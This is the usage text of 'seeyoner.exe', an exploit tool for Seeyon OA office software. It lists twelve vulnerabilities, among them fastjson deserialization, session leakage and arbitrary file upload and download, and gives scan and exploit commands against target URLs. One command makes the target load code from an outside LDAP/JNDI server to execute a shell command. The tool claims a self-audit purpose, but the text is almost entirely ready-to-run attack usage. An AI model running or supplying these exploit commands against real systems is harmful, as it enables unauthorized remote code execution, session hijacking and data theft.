致远OA漏洞利用工具
D:\>seeyoner.exe -h
一个简单的致远OA安全测试工具,目的是为了协助漏洞自查、修复工作。
Usage:
seeyoner.exe [command]
Available Commands:
exploit 漏洞利用
help Help about any command
list 列出所有漏洞信息
scan 漏洞检测
Flags:
-h, --help help for main.exe
Use "seeyoner.exe [command] --help" for more information about a command.
D:\>seeyoner.exe list
【1】seeyon<8.0_fastjson反序列化
【2】thirdpartyController.do管理员session泄露
【3】webmail.do任意文件下载(CNVD-2020-62422)
【4】ajax.do未授权&任意文件上传
【5】getSessionList泄露Session
【6】htmlofficeservlet任意文件上传
【7】initDataAssess.jsp信息泄露
【8】DownExcelBeanServlet信息泄露
【9】createMysql.jsp数据库信息泄露
【10】test.jsp路径
【11】setextno.jsp路径
【12】status.jsp路径(状态监控页面)
seeyoner.exe scan -u http://xxx.com -i 0
以探测seeyon<8.0_fastjson反序列化漏洞为例,指定编号为1
:
seeyoner.exe scan -u http://xxx.com -i 1
以Session泄露+zip文件上传解压为例,指定编号为2
:
seeyoner.exe exploit -u http://xxxx.com -i 2
seeyon<8.0_fastjson反序列化利用起来比较特殊:
# seeyoner.exe exploit -u {url}|{ldap}|{cmd} -i 1
# 示例
seeyoner.exe exploit -u http://xxxx.com|ldap://x.x.x.x:1389/TomcatBypass/TomcatEcho|whoami -i 1